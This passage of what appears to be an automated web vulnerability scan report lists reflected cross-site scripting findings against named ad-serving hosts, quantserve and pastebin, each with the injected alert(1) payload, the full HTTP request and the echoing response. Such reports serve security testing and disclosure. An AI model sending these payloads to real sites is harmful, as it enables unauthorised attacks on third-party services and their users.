3.62. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b5c1"-alert(1)-"8ce35333fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728&1b5c1"-alert(1)-"8ce35333fa2=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2441
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/;httponly

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_728&1b5c1"-alert(1)-"8ce35333fa2=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

3.63. http://flash.quantserve.com/quant.swf [lc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://flash.quantserve.com
Path:   /quant.swf

Issue detail

The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload 37405<a%20b%3dc>7b26340890c was submitted in the lc parameter. This input was echoed as 37405<a b=c>7b26340890c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quant.swf?qcv=2%2E1%2E1&url=http%3A%2F%2Fstatic%2Eslidesharecdn%2Ecom%2Fswf%2Fssplayer2%2Eswf%3Fdoc%3D3%2Draylyle%2Dviglinkforumconppt%2D1%2D110218170233%2Dphpapp01%26stripped%5Ftitle%3D3%2Dray%2Dlyleviglink%2Dforumcon%2Dppt1%26userName%3DVigLink&pageURL=http%3A%2F%2Fblog%2Eviglink%2Ecom%2F&stripped%5Ftitle=3%2Dray%2Dlyleviglink%2Dforumcon%2Dppt1&doc=3%2Draylyle%2Dviglinkforumconppt%2D1%2D110218170233%2Dphpapp01&flashPlayer=WIN%2010%2C2%2C154%2C27&fpf=1%2D0%2D0&userName=VigLink&media=widget&server=http%3A%2F%2Fflash%2Equantserve%2Ecom&lc=%5F1303238625614%5F138037405<a%20b%3dc>7b26340890c&videoId=embed%5Fplayer%5Fas3&publisherId=p%2DabU44ONrAuwk2 HTTP/1.1
Host: flash.quantserve.com
Proxy-Connection: keep-alive
Referer: http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=3-raylyle-viglinkforumconppt-1-110218170233-phpapp01&stripped_title=3-ray-lyleviglink-forumcon-ppt1&userName=VigLink
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EEgBCQHGBpEA

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-shockwave-flash
Cache-Control: private, no-transform, max-age=86400
Expires: Wed, 20 Apr 2011 18:43:51 GMT
Date: Tue, 19 Apr 2011 18:43:51 GMT
Server: QS
Content-Length: 4698

FWS.Z...x.._.........D.....C....?.0....X.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns
...[SNIP]...
ject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1303238625614_138037405<a b=c>7b26340890c.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=..    ..........O..............=................@...................    .
.................R....setUpLoc
...[SNIP]...

3.64. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57401"><script>alert(1)</script>c45cd3456f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM57401"><script>alert(1)</script>c45cd3456f/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW802t6rQACp/p; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM57401"><script>alert(1)</script>c45cd3456f/DLX/613821370/x96/default/empty.gif/72634857383032743672514143702f70?x" target="_top"><IMG SRC="
...[SNIP]...

3.65. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b04c"><script>alert(1)</script>d331ea74841 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX3b04c"><script>alert(1)</script>d331ea74841/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:06 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW802t6rYACzMV; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX3b04c"><script>alert(1)</script>d331ea74841/1296153028/x96/default/empty.gif/726348573830327436725941437a4d56?x" target="_top"><IMG SRC
...[SNIP]...

3.66. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 673dc"><script>alert(1)</script>a2584dc8a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x96673dc"><script>alert(1)</script>a2584dc8a HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:08 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW802t6rgADA1J; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 316
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX/515170640/x96673dc"><script>alert(1)</script>a2584dc8a/default/empty.gif/7263485738303274367267414441314a?x" target="_top"><IMG SRC="h
...[SNIP]...

3.67. http://pastebin.com/74KXCaEZ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /74KXCaEZ

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac1d9"><script>alert(1)</script>cc58d6ba2eb was submitted in the REST URL parameter 1. This input was echoed as ac1d9\"><script>alert(1)</script>cc58d6ba2eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /74KXCaEZac1d9"><script>alert(1)</script>cc58d6ba2eb HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:30 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:30 GMT; path=/; domain=.pastebin.com
Content-Length: 11338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/74KXCaEZac1d9\"><script>alert(1)</script>cc58d6ba2eb"/>
...[SNIP]...

3.68. http://pastebin.com/74KXCaEZ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /74KXCaEZ

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ee33"><script>alert(1)</script>b559bf62345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ee33\"><script>alert(1)</script>b559bf62345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /74KXCaEZ?6ee33"><script>alert(1)</script>b559bf62345=1 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:30 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:30 GMT; path=/; domain=.pastebin.com
Content-Length: 11329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/74KXCaEZ?6ee33\"><script>alert(1)</script>b559bf62345=1"/>
...[SNIP]...

3.69. http://pastebin.com/CvGXyfiJ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /CvGXyfiJ

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491c0"><script>alert(1)</script>1fb414533ea was submitted in the REST URL parameter 1. This input was echoed as 491c0\"><script>alert(1)</script>1fb414533ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CvGXyfiJ491c0"><script>alert(1)</script>1fb414533ea HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:32 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:32 GMT; path=/; domain=.pastebin.com
Content-Length: 11360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/CvGXyfiJ491c0\"><script>alert(1)</script>1fb414533ea"/>
...[SNIP]...

3.70. http://pastebin.com/CvGXyfiJ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /CvGXyfiJ

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aade4"><script>alert(1)</script>5eef0908687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aade4\"><script>alert(1)</script>5eef0908687 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CvGXyfiJ?aade4"><script>alert(1)</script>5eef0908687=1 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:31 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:31 GMT; path=/; domain=.pastebin.com
Content-Length: 11294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/CvGXyfiJ?aade4\"><script>alert(1)</script>5eef0908687=1"/>
...[SNIP]...

3.71. http://pastebin.com/DBDqm6Km [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /DBDqm6Km

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78747"><script>alert(1)</script>13324821e99 was submitted in the REST URL parameter 1. This input was echoed as 78747\"><script>alert(1)</script>13324821e99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DBDqm6Km78747"><script>alert(1)</script>13324821e99 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:27 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:27 GMT; path=/; domain=.pastebin.com
Content-Length: 11321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/DBDqm6Km78747\"><script>alert(1)</script>13324821e99"/>
...[SNIP]...

3.72. http://pastebin.com/DBDqm6Km [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /DBDqm6Km

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d31"><script>alert(1)</script>4d54ae0ed58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7d31\"><script>alert(1)</script>4d54ae0ed58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DBDqm6Km?a7d31"><script>alert(1)</script>4d54ae0ed58=1 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:26 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:26 GMT; path=/; domain=.pastebin.com
Content-Length: 11330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/DBDqm6Km?a7d31\"><script>alert(1)</script>4d54ae0ed58=1"/>
...[SNIP]...

3.73. http://pastebin.com/X8znzPWH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /X8znzPWH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06bd"><script>alert(1)</script>a97465dbc53 was submitted in the REST URL parameter 1. This input was echoed as f06bd\"><script>alert(1)</script>a97465dbc53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /X8znzPWHf06bd"><script>alert(1)</script>a97465dbc53 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:28 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:28 GMT; path=/; domain=.pastebin.com
Content-Length: 11318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/X8znzPWHf06bd\"><script>alert(1)</script>a97465dbc53"/>
...[SNIP]...

3.74. http://pastebin.com/X8znzPWH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /X8znzPWH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9ebb"><script>alert(1)</script>ccd34ed679c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9ebb\"><script>alert(1)</script>ccd34ed679c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /X8znzPWH?f9ebb"><script>alert(1)</script>ccd34ed679c=1 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:27 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:27 GMT; path=/; domain=.pastebin.com
Content-Length: 11352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/X8znzPWH?f9ebb\"><script>alert(1)</script>ccd34ed679c=1"/>
...[SNIP]...

3.75. http://pastebin.com/u/ComodoHacker [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /u/ComodoHacker

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f518"><script>alert(1)</script>94a013f3381 was submitted in the REST URL parameter 1. This input was echoed as 2f518\"><script>alert(1)</script>94a013f3381 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /u2f518"><script>alert(1)</script>94a013f3381/ComodoHacker HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:28 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:28 GMT; path=/; domain=.pastebin.com
Content-Length: 11336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/u2f518\"><script>alert(1)</script>94a013f3381/ComodoHacker"/>
...[SNIP]...

3.76. http://pixel.adsafeprotected.com/jspix [advId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the advId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a727c"-alert(1)-"0a1ceb9fb9d was submitted in the advId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jspix?anId=134&advId=2356384a727c"-alert(1)-"0a1ceb9fb9d&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CC3AB6842D7B651D85CA7B6C4E1FC931; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384a727c"-alert(1)-"0a1ceb9fb9d&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"di
...[SNIP]...

3.77. http://pixel.adsafeprotected.com/jspix [anId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17607"-alert(1)-"736181fd054 was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jspix?anId=13417607"-alert(1)-"736181fd054&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A51403344CE6616473144CCAD1E6CB41; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
os_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=13417607"-alert(1)-"736181fd054&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG
...[SNIP]...

3.78. http://pixel.adsafeprotected.com/jspix [campId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
